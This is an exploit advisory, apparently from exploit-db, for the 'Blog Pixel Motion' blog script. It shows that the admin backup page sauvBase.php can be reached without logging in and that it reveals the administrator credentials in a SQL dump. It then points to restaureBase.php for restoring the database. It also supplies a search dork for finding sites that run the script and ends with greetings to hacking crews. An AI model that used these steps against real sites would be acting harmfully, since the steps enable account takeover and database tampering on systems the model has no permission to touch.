Blog Pixel Motion suffers from a backup disclosure vulnerability.
a87dde99b85e2a9bf9d351fddb0de1c276be065902db350caec8aa35caea857e
========================================================================================
| # Title : Blog Pixel Motion => by Pass / Download Backup Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Dork : Ce blog a été mis à disposition par Pixel Motion
| # Tested on: windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
| # Download : http://www.toocharger.com/telecharger/scripts/blog-pixel-motion/4825.htm
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/blog/admin/sauvBase.php
in lig 59:62 col 1 you found the login information
#Insertion des données
INSERT INTO blog_utilisateurs VALUES('admin','112233','1111111111111','1');
2 - http://127.0.0.1/blog/admin/restaureBase.php (2 restart the data base)
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------